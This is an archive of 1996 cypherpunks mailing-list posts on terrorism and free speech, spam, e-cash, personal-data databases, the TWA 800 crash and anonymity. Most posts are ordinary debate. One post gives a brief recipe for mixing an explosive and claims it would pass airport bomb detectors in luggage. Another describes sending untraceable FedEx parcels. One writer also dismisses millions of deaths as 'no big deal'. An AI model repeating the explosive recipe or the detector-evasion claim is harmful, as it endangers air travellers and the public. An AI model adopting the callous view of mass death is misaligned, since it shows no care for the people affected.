From adam at homeport.org Mon Sep 9 12:45:46 1996
From: adam at homeport.org (Adam Shostack)
Date: Tue, 10 Sep 1996 03:45:46 +0800
Subject: [WAS xs4all.nl] Terrorists
In-Reply-To:
Message-ID: <199609091635.LAA16589@homeport.org>

Stephan Schmidt wrote:

| One thought : How many of you would support terrorist
| web server (say Oklahoma, TWA, Iran, Libya, RAF, IRA, ...) ?

I've given support to at least two terrorist organizations, probably
closer to five in the last year. I can't see supporting one more would
do any more harm.

Adam

--
"It is seldom that liberty of any kind is lost all at once."
-Hume

From fletch at ain.bls.com Mon Sep 9 13:08:46 1996
From: fletch at ain.bls.com (Mike Fletcher)
Date: Tue, 10 Sep 1996 04:08:46 +0800
Subject: Junk Phone Calls, Metered Usage, and Cellphones
In-Reply-To:
Message-ID: <9609091539.AA04462@outland>

[ Telemarketer script removed, (spit :) ]

>
> As you yourself point out, their charging you for each incoming call during
> business hours is unacceptable. Why don't they bill the 42c / minute to
> whomever is calling YOU, as they do with LD and 900 numbers?

This is why I really like the service that I have. I have a "personal
number" that is my voice, fax, pager, and voice mail. If someone calls
it, it asks them to wait while it locates me. It then has a list of
numbers it calls to try and find me (desk at work, cell phone, home phone
after 5pm or weekends). When I answer it tells me who's on the phone, and
if I don't want to talk to them I just hit a key and throw them to the
voice mail wolves.

As for billing the caller, from what I hear at work I think it's because
of problems with the way the cellular network does billing that
(currently) make caller-pays cellular undoable. But that's a telephony
problem and I'm just the resident UNIX weenie. :)

---
Fletch                                                      __`'/|
fletch at ain.bls.com  "Lisa, in this house we obey the      \ o.O'   ______
404 713-0414(w)       Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43   U      ------

From netsurf at pixi.com Mon Sep 9 13:11:06 1996
From: netsurf at pixi.com (NetSurfer)
Date: Tue, 10 Sep 1996 04:11:06 +0800
Subject: Court challenge to AOL junk-mail blocks
In-Reply-To: <960906233848_279253392@emout14.mail.aol.com>
Message-ID:

On Fri, 6 Sep 1996 AwakenToMe at aol.com wrote:

> Tell me about it. Im on AOL. WHO CARESSSSSSS if ya get one MAYBE two pieces
> of mail you take LESS than a second to delete them both with the handy
> delete key. These people are wasting more time complaining about it than they
> will ever do actually deleting it.

If you know a valid email address on the spammers system you can always
bounce each message back to them. If enough people turned the messages
back on them it might give them the opportunity to experience first hand
what it's like to receive tons of mail you don't want or need...

#include
     _   __     __  _____            ____
    / | / /__  / /_/ ___/__  _______/ __/__  _____
   /  |/ / _ \/ __/\__ \/ / / / ___/ /_/ _ \/ ___/
  / /|  /  __/ /_ ___/ / /_/ / /  / __/  __/ /
================/_/=|_/\___/\__//____/\__,_/_/==/_/==\___/_/===============

From reagle at rpcp.mit.edu Mon Sep 9 13:16:18 1996
From: reagle at rpcp.mit.edu (Joseph M. Reagle Jr.)
Date: Tue, 10 Sep 1996 04:16:18 +0800
Subject: E-Cash Poses Worldwide Banking Threat - Report 09/06/96
Message-ID: <2.2.32.19960909160217.00a04d9c@206.33.128.129>

>PALO ALTO, CALIFORNIA, U.S.A., 1996 SEP 6 (NB) -- By Richard Bowers.
>By the year 2000, consumers, businesses, governments, and
>educational institutions worldwide will use electronic cash (e-cash)
>for nine billion payment transactions. According to a new study by Killen
>& Associates, this increase in e-cash will pose a great threat to some of
>the biggest institutions in the world.
>
>The report specifically highlights the risk to the retail and banking
>industries. Speaking to Newsbytes, a spokesperson for Killen said that
>the report, which will be issued later this month, gives little solace to
>the problems facing traditional retail companies. The report does
>however, say that the banks can regain the leadership position in
>payments by moving quickly to leverage their payment transaction
>infrastructure to fully support e-cash.
>
>"By 2005, e-cash transactions will escalate to almost 30 billion,"
>stated Michael Killen, president of the market research firm. "Banks
>must act quickly to leverage their position in payment services.
>Non-banks see this as a new opportunity to carve further market share
>away from the banking industry. All will compete for new revenue
>streams including Internet-based micropayments."
>
>The report uses a very broad definition of e-cash including among
>others; secured debit cards, phone cards, electronic checks, ATM
>transactions, point of sale loans, and automated tolls.
>
>Using this broad definition they estimate that in 1995 there were 536
>billion non e-cash transactions worldwide compared to only 1 billion
>e-cash transactions, or about .0019 percent. By the year 2005, of a
>total estimated 1 trillion transactions, the report predicts 3 percent
>or around 30 billion transactions will be e-cash.
>
>"The impact of e-cash will be widespread on both banking and
>commerce," Killen added. "Opportunities will open for financial and
>other product and services players, including ATM vendors such as
>NCR, Diebold, and IBM; credit card authorization firms, including First
>Data, Total Systems, Equifax, and National Data; ATM/POS terminal
>manufacturers and network suppliers, including bank-owned
>networks, American Express, Deluxe, ACS, and VeriFone; and cash
>handling/cash management services firms such as ADP, GEIS, National
>Data, and Brinks. Software firms that understand the enormous
>system integration opportunities of adapting legacy systems to
>on-line, secured environments will also benefit from the need to support
>e-cash transactions."
>
>The report will include forecasts of the overall payments environment
>and the impact of e-cash on cash, checks, credit cards, and other
>electronic payment systems though the year 2005. It will also have a
>section on the opportunities for new business, dislocations, and
>threats to existing businesses, with emphasis on acquisition and
>alliance opportunities.
>
>"E-cash provides the necessary payment options to support new and
>low-cost products and services, including micropublishing," Killen
>continued. "Information services such as AC Nielsen, Dun & Bradstreet,
>and Wall Street investment and advisory firms will fill their clients'
>needs for customized news. This will lead to a new understanding of
>personal and commercial buying patterns, wants, and needs.
>Individual consumer purchase, transaction, and life-style profiles will
>be developed. Advertisers can then use this information to target
>market-customized advertising and marketing programs."
>
>(19960906/Press Contact: Jules Street, Killen & Associates,
>415-617-6130)
>
>
>
_______________________
Regards,            Nothing is so strong as gentleness, and nothing is so
                    gentle as true strength. -Ralph Sockman
Joseph Reagle       http://rpcp.mit.edu/~reagle/home.html
reagle at mit.edu    E0 D5 B2 05 B6 12 DA 65 BE 4D E3 C1 6A 66 25 4E

From reagle at rpcp.mit.edu Mon Sep 9 13:17:10 1996
From: reagle at rpcp.mit.edu (Joseph M. Reagle Jr.)
Date: Tue, 10 Sep 1996 04:17:10 +0800
Subject: IBM to unveil Internet banking alliance
Message-ID: <2.2.32.19960909160218.00a490a4@206.33.128.129>

>Date: Mon, 9 Sep 1996 11:20:03 -0400
>From: reagle at rpcp.mit.edu (Joseph M. Reagle Jr.)
>To: reagle at rpcp.mit.edu
>Subject: IBM to unveil Internet banking alliance
>
>
>
> SAN FRANCISCO (Reuter) - International Business Machines
>Corp. has made an alliance with more than a dozen
>major banks to provide consumer banking services using
>Internet technology, IBM and industry executives said Friday.
> The consortium will be dubbed Integrity and will be owned
>equally by IBM and each of the partners.
> Banks will be able to use IBM's worldwide private network
>as well as the Internet to enable their customers to do their
>banking electronically. Specific details of the banking
>arrangement have yet to be worked out, one of the executives
>said.
> IBM and the banking institutions involved are due to
>unveil the Integrity project in New York on Monday.
> The alliance is one of several industry projects that
>IBM's Internet Division is establishing to help large
>companies utilize the Internet.
> The banking alliance will have competition from other
>electronic banking services being organised by companies like
>Intuit Corp., America Online Inc. and Microsoft Corp.
> Just this week, Intuit and America Online said a number of
>leading financial institutions would offer their customers
>online banking via AOL, using software developed by Intuit
>known as BankNOW.
> At an Internet and Electronic Commerce conference in San
>Francisco this week, Intuit Chairman Scott Cook said the new
>service targets people who want to use electronic transactions
>to speed up their banking.
> Cook said he expects the new service will differ from what
>the IBM-led consortium might provide.
> NationsBank has been among companies frequently mentioned
>as participating in the IBM consortium, but a spokesman late
>on Friday declined to discuss a Wall Street Journal report
>that it would be involved in the consortium.
>
>
>
_______________________
Regards,            Nothing is so strong as gentleness, and nothing is so
                    gentle as true strength. -Ralph Sockman
Joseph Reagle       http://rpcp.mit.edu/~reagle/home.html
reagle at mit.edu    E0 D5 B2 05 B6 12 DA 65 BE 4D E3 C1 6A 66 25 4E

From tcmay at got.net Mon Sep 9 13:32:47 1996
From: tcmay at got.net (Timothy C. May)
Date: Tue, 10 Sep 1996 04:32:47 +0800
Subject: [WAS xs4all.nl] Terrorists
Message-ID:

At 11:50 AM 9/9/96, Jon Lebkowsky wrote:
>At 11:01 AM 9/9/96 +0200, Stephan Schmidt wrote:
>
>>One thought : How many of you would support terrorist
>>web server (say Oklahoma, TWA, Iran, Libya, RAF, IRA, ...) ?
>
>I.e. "How many of you support the right to free speech regardless of content."
>
>Wellll...there is the rule about speech which endangers; "fire in a crowded
>theatre" is the cliche-example. What could a terrorist SAY that would
>endanger? Personally, I'd rather have terrorists building html than bombs.

As Dettweiler is usually so fond of pointing out, it would be disingenuous
of us not to acknowledge that the systems we are talking about (fully
untraceable, strong anonymity, digital pseudonyms, digital cash,
information markets, i.e., "crypto anarchy") will in fact be used for all
sorts of things.

Including folks who want to blow up Parliament, the Congress, the People's
Tribunal, etc. And by folks who wish to trade in CBW secrets, who wish to
arrange contract killings, and so on.

This has been well-known for many years. My paper on "Crypto Anarchy and
Virtual Communities" was vilified by no less than Dorothy Denning for
describing how these things may evolve.

I don't worry overmuch about a few thousand or even a few million people
dying as a result of something we have had an influence on developing,
anymore than the developers of many technologies need to worry about how
others use their technologies.

And the net effect of crypto anarchy is to destabilize and marginalize
central governments, which is a net positive effect. If some eggs get
broken in the process, the biological imperative will generate more eggs.

No big deal.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From jfricker at vertexgroup.com Mon Sep 9 13:40:57 1996
From: jfricker at vertexgroup.com (John F. Fricker)
Date: Tue, 10 Sep 1996 04:40:57 +0800
Subject: [WAS xs4all.nl] Terrorists
Message-ID: <2.2.32.19960909163116.00f89c8c@vertexgroup.com>

At 08:32 AM 9/9/96 EDT, you wrote:
>Stephan Schmidt writes:
>
>> One thought : How many of you would support terrorist
>> web server (say Oklahoma, TWA, Iran, Libya, RAF, IRA, ...) ?
>
>http://www.terrorist.org ?
>

Damn! In my backyard no less!

whois terrorist.org

Terrorist Organization (TERRORIST2-DOM)
   1525 SW 14th #4
   Portland, OR 97201
   US

From jfricker at vertexgroup.com Mon Sep 9 14:01:47 1996
From: jfricker at vertexgroup.com (John F. Fricker)
Date: Tue, 10 Sep 1996 05:01:47 +0800
Subject: [less paranoid NOISE] Re: Odd Satellite observations
Message-ID: <2.2.32.19960909163111.00f9f3a0@vertexgroup.com>

Ok well like I said it was just paranoid noise.

So the sats can locate ships at sea. I wonder what else?

At 01:58 PM 9/9/96 GMT, Jim wrote:
>On Sun, 08 Sep 1996 11:45:45 -0700, I wrote:
>
>>I saw three satellites gliding across the sky (east to west) in
>>a tight right triangle formation. The entire formation was not
>>bigger than my hand at arms length. Has anyone else observed
>>this?
>
>John: You probably saw one of the NOSS (Naval Ocean Surveillance
>System) constellations. There are several of these groupings -- all
>in triangular arrays. They use some form of interferometry to locate
>ships at sea.
>
>Jim
>
>
>

From tbyfield at panix.com Mon Sep 9 14:02:06 1996
From: tbyfield at panix.com (tbyfield at panix.com)
Date: Tue, 10 Sep 1996 05:02:06 +0800
Subject: TWA 800 - hit by an unarmed US missile?
In-Reply-To:
Message-ID: <199609091638.MAA19400@mail2.panix.com>

vince at offshore.com.ai (Vincent Cate):

> If the Navy was firing missiles in this area, it really does seem like the
> press should be checking out this angle.

What makes you think they aren't?

/t

From perry at piermont.com Mon Sep 9 14:02:15 1996
From: perry at piermont.com (Perry E.
Metzger) Date: Tue, 10 Sep 1996 05:02:15 +0800 Subject: Imminent Death of the Internet, GIF at 11 In-Reply-To: Message-ID: <199609091614.MAA24724@jekyll.piermont.com> Martin Minow writes: > For several months (years?) Bob Metcalf has been predicting that > the Internet will self-destruct from overload. His argument > appears to follow one of Gordon Bell's maxims: "anyone can predict > the future: all you need is semi-log paper and a ruler." As I > understand it, Metcalf's argument is that network load (messages, > packets) is growing exponentially, while network bandwidth (fiber > capacity, switch performance) is growing linearly. At some point, > these two curves cross -- and demand will exceed capacity. Except for the following. 1) TCP backs off. 2) Capacity is growing exponentially. Perry From afabbro at umich.edu Mon Sep 9 14:07:01 1996 From: afabbro at umich.edu (Andrew Fabbro) Date: Tue, 10 Sep 1996 05:07:01 +0800 Subject: Lexis-Nexis Database Message-ID: Note: personal experience indicates that L-N can remove you without your SSN, so there's no need to provide it, though they'll ask for it. Expect to attend a mandatory on-hold-music concert with a 20-25 minute program. L-N won't verify if your name is in the database, but will "performa process which will remove you if you are there". Andrew Fabbro ITD Marketing Research http://www-personal.umich.edu/~afabbro/ PGP mail preferred; finger for key ---------------------------------------------------------------------- PRIVACY Forum Digest Tuesday, 3 September 1996 Volume 05 : Issue 17 ---------------------------------------------------------------------- Date: Tue, 3 Sep 1996 11:22:15 -0400 (EDT) From: Larry Hunter Subject: Lexis-Nexis personal information database Lexis-Nexis sells a commercial database called "Ptrax" which holds detailed personal information on nearly all Americans (L-N claims it contains 300 million names). 
This database includes name, current address, up to two previous addresses, phone number, birth-date, social security number, mother's maiden name and possibly other personal information. This database is kept quite current. Through the Nexis Express service, this information could be available to any individual with a credit card. As most readers are aware, such information could easily be used for theft of identity and other frauds. It is possible to have one's name removed from this database by making a telephone request. Call (800)543-6862, select option 4 ("all other questions") and tell the representative answering that you wish to remove your name from the Ptrax database. You may also send a fax to (513)865-7360, or physical mail to LEXIS-NEXIS / P.O. Box 933 / Dayton, Ohio 45401-0933. Sending physical mail to confirm your name has been removed is always a good idea. As word of the existence of this database has spread on the net, Lexis-Nexis has been inundated with calls, and has set up a special set of operators to handle the volume. In addition, Andrew Bleh (rhymes with "Play") is a manager responsible for this product, and is the person to whom complaints about the service could be directed. He can be reached at the above 800 number, select option 4 and then ask for extension 3385. The information in this note has been confirmed by me, and was originally provided in forwarded messages from Russell Whitaker, Jason Werner, Vern Winters, Katherine Florman and Reuben Snipper. Larry Hunter hunter at intr.net ------------------------------ End of PRIVACY Forum Digest 05.17 ************************ From whgiii at amaranth.com Mon Sep 9 14:50:23 1996 From: whgiii at amaranth.com (William H. Geiger III) Date: Tue, 10 Sep 1996 05:50:23 +0800 Subject: ... subversive leftists In-Reply-To: Message-ID: <199609091708.MAA25050@mailhub.amaranth.com> In , on 09/09/96 at 12:53 PM, Stephan Schmidt said: >I hope this one was ironic.
>> The Democratic People's German Reich is fully justified in cutting off >> contacts with subversive radical publications in Jew-dominated nations like >> Holland. >> >> As Reichskommander Schmidt points out: "The citizen-units who access > ^^^^^^^^^^^^^^^^^^^^^^^ >But this one is tasteless and insulting even if it was >meant ironic. If the boot fits....... -- ----------------------------------------------------------- William H. Geiger III http://www.amaranth.com/~whgiii Geiger Consulting WebExplorer & Java Enhanced!!! Merlin Beta Test Site - WarpServer SMP Test Site Author of PGPMR2 - PGP Front End for MR/2 Ice Look for MR/2 Tips & Rexx Scripts Get Work Place Shell for Windows!! PGP & MR/2 the only way for secure e-mail. Finger whgiii at amaranth.com for PGP Key and other info ----------------------------------------------------------- MR/2 Tag->My best view from a Window was through OS/2. From hallam at ai.mit.edu Mon Sep 9 14:51:46 1996 From: hallam at ai.mit.edu (hallam at ai.mit.edu) Date: Tue, 10 Sep 1996 05:51:46 +0800 Subject: Los Angeles Times article on Helsingius and anon.penet.fi In-Reply-To: Message-ID: <9609091707.AA27901@etna.ai.mit.edu> >I and you may well choose to do so, but the vast majority of the human >beings believe just anything that is repeated loud and long enough. >Otherwise, nobody would hire PR and pay for advertisement, politicians >wouln't be fedwith taxpayer's money, Bosnians would trade goods instead >of gunshots, etc. I'm personally not interested in conjuring up the latest >utopia for a minoritarian sect of illuminati: I need to live in the real >world, and push for viable solutions that change it for better, now. The question is not whether defamation is a problem but whether the courts make the problem better or worse. I think that any analysis of the behaviour of the scientologists would indicate that the courts make the problem worse. 
Similarly the English libel laws have been used by a long line of crooks and swindlers to extort money. Robert Maxwell being an extreme example. The thing about the Internet is that it is possible to make a reply. This does not help of course in the example cited, but I don't think that the Mutlu/Serdar flamebot could have been dealt with through the court system. (For those of you who don't know, a poster calling himself first Hasan B Mutlu, then Serdar Argic used to make insulting responses to anyone who made a Usenet post about the Middle East. Mutlu was in fact a Perl script run by an agent of the Turkish intelligence services, the objective being to discredit all mention of the Turkish massacre of the Armenians through use of counter propaganda. Mutlu disappeared from the net at the same time that the sysop of the system he was posting from was deported for overstaying his visa.) Phill From snow at smoke.suba.com Mon Sep 9 15:37:29 1996 From: snow at smoke.suba.com (snow) Date: Tue, 10 Sep 1996 06:37:29 +0800 Subject: IDC_ard In-Reply-To: <199609071146.LAA06846@pipe1.t1.usa.pipeline.com> Message-ID: On Sat, 7 Sep 1996, John Young wrote: > 9-8-96. NYP Mag: > "The True Terror Is In the Card." > Faced with rising crime, illegal immigration, welfare > fraud and absentee parents, many bureaucrats and members > of Congress insist that the nation would run more > smoothly if we all had counterfeit-proof plastic > identity cards. > Let's be clear that this is a one-way street. Once > having established a requirement to carry photo ID, it > will be difficult if not impossible to reverse. I wouldn't go so far as to say "impossible". It also should be relatively easy to get a couple of these. Petro, Christopher C.
petro at suba.com snow at smoke.suba.com From wlkngowl at unix.asb.com Mon Sep 9 15:47:18 1996 From: wlkngowl at unix.asb.com (Mutatis Mutantdis) Date: Tue, 10 Sep 1996 06:47:18 +0800 Subject: Snake-Oil FAQ Message-ID: <199609091741.NAA09272@unix.asb.com> -----BEGIN PGP SIGNED MESSAGE----- Subject: Snake-Oil FAQ's New Maintainer From: Rob Rothenburg Walking-Owl C. Matthew Curtin will be taking-over the "Snake-Oil FAQ". I no longer have the time to finish (let alone maintain) it. - --Rob From snow at smoke.suba.com Mon Sep 9 15:56:10 1996 From: snow at smoke.suba.com (snow) Date: Tue, 10 Sep 1996 06:56:10 +0800 Subject: Court challenge to AOL junk-mail blocks In-Reply-To: <960906233848_279253392@emout14.mail.aol.com> Message-ID: On Fri, 6 Sep 1996 AwakenToMe at aol.com wrote: > In a message dated 96-09-06 23:31:06 EDT, rwright at adnetsol.com (Ross Wright) > writes: > << Everyone on this list seems to want to limit > government intervention EXCEPT when it comes to spam, then every > one just holds the door open wide and let them in. If they get that > inch, they WILL take the whole 9 YARDS!!!!!! Get a clue, delete or > killfile those who spam and keep the government out of > cyberspace!!!!!! > >> > Tell me about it. Im on AOL. WHO CARESSSSSSS if ya get one MAYBE two pieces > of mail you take LESS than a second to delete them both with the handy > delete key. These people are wasting more time complaining about it than they > will ever do actually deleting it.
I would guess that AOL isn't doing it just because of user complaints. AOL has millions of accounts, and spammers try to hit ALL of the addresses. That probably (I am guessing here) doubles (or triples) the load on AOL's already over burdened mail system. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From frissell at panix.com Mon Sep 9 16:03:23 1996 From: frissell at panix.com (Duncan Frissell) Date: Tue, 10 Sep 1996 07:03:23 +0800 Subject: Crypto Anachy MUD Message-ID: <2.2.32.19960909183805.008b9c70@panix.com> Did anyone make the point (I gave up on the thread) that we already have a great Crypto Anarchy MUD with lots of the coding already done. We call it the Internet. Digital cash, strong crypto, remailers, everything. I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it. DCF From azur at netcom.com Mon Sep 9 16:04:22 1996 From: azur at netcom.com (Steve Schear) Date: Tue, 10 Sep 1996 07:04:22 +0800 Subject: Anonymous FedEx, was: What is the EFF doing exactly? Message-ID: >David Lesher wrote: >Try & mail an anonymous FedEx package. Not a problem. You merely use the FedEx number of local company. Get FedEx forms from an unmanned FedEx pick-up point, fill one in (using an impact printer, if desired, to simulate the appearance of the pre-addressed forms given to their regular customers), attach to parcel and drop it in the box (no finger prints please). Works like a charm. PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9 --------------------------------------------------------------------- Snoop Daty Data | Internet: azur at netcom.com Grinder | Voice: 1-702-655-2877 Sacred Cow Meat Co. | Fax: 1-702-658-2673 7075 W. Gowan Road, #2148 | Las Vegas, NV 89129 | --------------------------------------------------------------------- Just say NO to perscription DRUGS. 
From stewarts at ix.netcom.com Mon Sep 9 16:08:14 1996 From: stewarts at ix.netcom.com (stewarts at ix.netcom.com) Date: Tue, 10 Sep 1996 07:08:14 +0800 Subject: Anonymous phone calls (was: What is the EFF doing exactly?) Message-ID: <199609091748.NAA27475@attrh1.attrh.att.com> At 01:03 PM 9/7/96 CST, roy at scytale.com wrote: >In Minneapolis, USWest has Telecard phones everywhere, and vending >machines with bill accepters. The calls are also flat rate at $0.25. ... >Can Telecards be audited for usage? If a TLA black-bags my $25 Telecard >from my wallet, can they reconstruct what calls I made with it? Easily. They get the card number off the card, and then check their long distance records for calls made with that card number. With some cards, you can recharge the card instead of getting new ones, if for some reason you want to increase the audit trail substantially. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From declan at eff.org Mon Sep 9 16:12:27 1996 From: declan at eff.org (Declan McCullagh) Date: Tue, 10 Sep 1996 07:12:27 +0800 Subject: TWA flight 800, surface to air missles, conspiracypunks Message-ID: ---------- Forwarded message ---------- Date: Mon, 9 Sep 1996 11:26:23 -0700 (PDT) From: Brock N. Meeks To: Declan McCullagh Surface to air missiles do not need to make contact to explode. They have a proximity system that explodes the missile if it gets within range. Of course, sometimes the missile does hit; there is a famous story -- documented -- of an SA-2 (an old Soviet SAM) hitting an RF-4 during Viet Nam. The missile didn't explode but stuck in the plane like a dart; the pilot flew the plane back to the airfield and was told to ditch the plane when the air traffic control noticed it stuck in his plane.
-- Brock From pjb at ny.ubs.com Mon Sep 9 16:20:23 1996 From: pjb at ny.ubs.com (pjb at ny.ubs.com) Date: Tue, 10 Sep 1996 07:20:23 +0800 Subject: talker Message-ID: <199609091814.OAA03889@sherry.ny.ubs.com> sure sounds like it. is it possible that there could be two such as this? -paul > From cypherpunks-errors at toad.com Sun Sep 8 03:04:36 1996 > X-Authentication-Warning: jekyll.piermont.com: Host perry at localhost didn't use HELO protocol > To: doom13 at juno.com (Floyd W Odom) > Cc: cypherpunks at toad.com > Subject: Re: talker > Reply-To: perry at piermont.com > X-Reposting-Policy: redistribute only with permission > Date: Sat, 07 Sep 1996 23:40:18 -0400 > From: "Perry E. Metzger" > Sender: owner-cypherpunks at toad.com > Content-Length: 255 > > > Floyd W Odom writes: > > I am doom13. If there is anyone out there who is a hacker or > > would like to be one you can talk to me and find out stuff like cracking. > > Just drop a message at doom13 at juno.com. > > Are you the same jerk who was posting a week ago? > From frissell at panix.com Mon Sep 9 16:23:52 1996 From: frissell at panix.com (Duncan Frissell) Date: Tue, 10 Sep 1996 07:23:52 +0800 Subject: [WAS xs4all.nl] Terrorists Message-ID: <2.2.32.19960909182912.008bf55c@panix.com> At 11:35 AM 9/9/96 -0500, Adam Shostack wrote: >Stephan Schmidt wrote: > >| One thought : How many of you would support terrorist >| web server (say Oklahoma, TWA, Iran, Lybia, RAF, IRA, ...) ? > >I've given support to at least two terrorist organization, probably >closer to five in the last year. I can't see supporting one more >would do any more harm. > >Adam And I support a terrorist organization (the US Government) every year whether I want to or not. The US was convicted of a major violation of international law (akin to terrorism) in the International Court of Justice back in the '80s for air sowing mines in Nicaragua's main harbor. 
DCF From dthorn at gte.net Mon Sep 9 16:43:46 1996 From: dthorn at gte.net (Dale Thorn) Date: Tue, 10 Sep 1996 07:43:46 +0800 Subject: ... subversive leftists In-Reply-To: Message-ID: <3234583F.50E3@gte.net> Stephan Schmidt wrote: > I hope this one was ironic. > The Democratic People's German Reich is fully justified in cutting off > contacts with subversive radical publications in Jew-dominated nations > like Holland. > As Reichskommander Schmidt points out: "The citizen-units who access > But this one is tasteless and insulting even if it was > meant ironic. > -stephan Just a note: 'Jew' when used as an adjective is considered demeaning and offensive. One should use 'Jewish' instead. From snow at smoke.suba.com Mon Sep 9 16:47:48 1996 From: snow at smoke.suba.com (snow) Date: Tue, 10 Sep 1996 07:47:48 +0800 Subject: 9yrold In-Reply-To: <19960908.125436.3318.0.Doom13@juno.com> Message-ID: This worked in RL once, so I'll try it here. What you do is look the pest in the eye and say: GO AWAY. In a really loud voice. On Sun, 8 Sep 1996, Floyd W Odom wrote: > Does anyone out there know any kids mailing lists, because my little > brother Richard just joined and he doesn't have anything to mail to he's > only 9 years old. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From varange at crl.com Mon Sep 9 16:52:54 1996 From: varange at crl.com (Troy Varange) Date: Tue, 10 Sep 1996 07:52:54 +0800 Subject: Guns Don't Kill People, IP Does In-Reply-To: Message-ID: <199609091802.AA16555@crl5.crl.com> > One thought : How many of you would support terrorist > web server (say Oklahoma, TWA, Iran, Lybia, RAF, IRA, ...) ? > > -stephan Consdering how none of the above incidents are connected in any way to the internet, what do you mean? And what if there were bomb making instructions on the internet and people are killed on account of it, so what? Mix roughly equal amounts of potassiam chlorate and red phosphorous together while thoroughly wet. 
When the mixture dries it becomes a fulminating highly explosive mixture that doesn't even contain a nitrogen molecule, so seventy pounds of the explosive can be brought onto an airplane by passing through the nitrogen bomb sniffers in luggage. You are now a potential terrorist Stephan Schmidt. If the anti-extremists had their way, you will be a top candidate for arrest for being a dangerous German, we all know that now, we can honestly testify in German court you openly subscribed to an internet high tech e-mailing list where terrorist secrets were being traded. How do you feel about being a terrorist, Mr. Schmidt? From declan at well.com Mon Sep 9 16:52:57 1996 From: declan at well.com (Declan McCullagh) Date: Tue, 10 Sep 1996 07:52:57 +0800 Subject: CATO terrorism conference -- tomorrow @ 8:30 am, free Message-ID: More info on tomorrow's terrorism conference at CATO is at: http://www.cato.org/events/calendar.html This is especially timely given the report that the Aviation Safety and Security Commission (chaired by Gore) sent to Clinton with 20 recommendations. One is to enact "automated passenger profiling" of all domestic travellers, which would include airline access to FBI/CIA databases. This $10 million project bans anonymous air travel and, needless to say, raises significant privacy questions. -Declan >Date: Mon, 9 Sep 1996 12:23:13 -0400 >Mime-Version: 1.0 >To: declan at well.com (Declan McCullagh) >From: Solveig Bernstein >Subject: Terrorism Conference > >Cato's Conference, *Combatting Terrorism, Preserving Freedom," scheduled for >Tuesday, September 10, 1996 is now > > >* FREEEEE* > >That's right, the registration fee of $50 has been WAIVED!!! > >Come listen to Nadine Strossen, Dorothy Denning, David Kopel, and many >others discuss terrorism, foreign policy, civil liberties, and the >telecommunications infrastructure. > >Please redistribute freely. > >Conference begins at 8:30 at 1000 Mass. Ave. 
> > >- Solveig >********************************************************************** >Solveig Bernstein, Esq. >(202) 789-5274 >(202) 842-3490 (fax) > >Assistant Director of Telecommunications & Technology Studies >Cato Institute >1000 Mass. Ave. NW >Washington, DC 20001 > From snow at smoke.suba.com Mon Sep 9 17:18:41 1996 From: snow at smoke.suba.com (snow) Date: Tue, 10 Sep 1996 08:18:41 +0800 Subject: [WAS xs4all.nl] Terrorists In-Reply-To: Message-ID: On Mon, 9 Sep 1996, Stephan Schmidt wrote: > One thought : How many of you would support terrorist > web server (say Oklahoma, TWA, Iran, Lybia, RAF, IRA, ...) ? If Iran, the IRA, etc. wanted to pay me to host a web page that described their goals and methods, I would. I believe in free speach, and that means even if I disagree. Then again, the only reason I am not a terrorist is that the government hasn't YET defined hate speach directed against the government to be terrorism. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From hallam at ai.mit.edu Mon Sep 9 17:42:52 1996 From: hallam at ai.mit.edu (Hallam-Baker) Date: Tue, 10 Sep 1996 08:42:52 +0800 Subject: Kiddie porn on the Internet In-Reply-To: <50us2f$o5c@life.ai.mit.edu> Message-ID: <323459CE.31DF@ai.mit.edu> Dale Thorn wrote: > > "News" stories are now circulating on radio about child pornography on > the Internet, and how an organization called "Save The Children" is > working very hard to identify the trafficers and their accomplii. > > Save The Children is complaining that they can't find all of the dirty > dealers of kid-porn, since much of the traffic is encrypted! > > So who is Save The Children? First, since they're an international > organization raising funds in the U.S., they obviously operate at the > pleasure of the State Department. Ho hum. Remember the incidents at the > Denny's restaurant chain where Denny's was sued for discrimination > against minorities? Did it seem a little bizarre for the 1990's? 
I'm trying to work out just what sort of confused idea is going on here. Save the Children is an international charity that is based in the UK. It is ultra respectable, Princess Anne being its president and very active in that role (i.e. not merely titular). It's also apolitical which it has to be for tax reasons and because otherwise the royals couldn't have anything to do with it. Their main mission is sending food to Ethiopia and other famine areas, development work etc. It is ultra-worthy stuff. I think that a more rational explanation of the Denny's case is that being weasels the Denny's management decided they needed some good PR before the judgement brought them bad PR. >*** The receivers of the porn should not be punished for the photographer's >action, the same as if I would complain that someone burglarized my home because >I left the door open. It was their ignorance that caused their loss. It's the consumers who create a market. If someone burgles your house and I knowingly buy the stolen goods it's a crime. Phill From frissell at panix.com Mon Sep 9 18:22:11 1996 From: frissell at panix.com (Duncan Frissell) Date: Tue, 10 Sep 1996 09:22:11 +0800 Subject: [WAS xs4all.nl] Terrorists Message-ID: <2.2.32.19960909182918.008a40e0@panix.com> At 01:49 AM 9/9/96 -0700, Timothy C. May wrote: >I don't worry overmuch about a few thousand or even a few million people >dying as a result of something we have had an influence on developing, >anymore than the developers of many technologies need to worry about how >others use their technologies. > >And the net effect of crypto anarchy is to destabilize and marginalize >central governments, which is a net positive effect. If some eggs get >broken in the process, the biological imperative will generate more eggs. >No big deal. Particularly since governments murdered 160 million in the last 100 years while we civilians have only managed to murder a paltry 20 million or fewer.
